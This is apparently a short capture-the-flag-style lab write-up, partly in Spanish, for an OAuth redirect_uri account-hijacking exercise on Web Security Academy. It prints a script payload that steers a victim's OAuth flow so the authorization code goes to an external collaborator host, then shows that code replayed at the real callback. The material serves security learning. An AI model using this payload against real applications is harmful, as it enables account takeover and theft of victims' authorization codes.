4 - OAuth account hijacking via redirect_uri

Authorization Code Grant Type (response_type=code) :

GET /auth?client_id=q915ketoagt2nasucjbc7&redirect_uri=https://0a6200be04527b9f81c02a56008c00bc.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email HTTP/2
<script>
document.location='https://oauth-0a9e00d304bba001811b1e81021400b7.oauth-server.net/auth?client_id=pujzm6j861iwqutbz7nrj&redirect_uri=https://zx08szy8tkdvaqlhl1o24stao1uwin8bx.oastify.com/oauth-callback&response_type=code&scope=openid%20profile%20email'
</script>

Luego accederíamos al callback real con el código que nos llega en el collaborator :

https://0a9f002b0421a04d81742009007e006d.web-security-academy.net/oauth-callback?code=fSRO55naPkbCcfCk0vXiGvegFS19e2CHPHZZh-qX_y9

OAuth 2.0 authentication vulnerabilities | Web Security Academy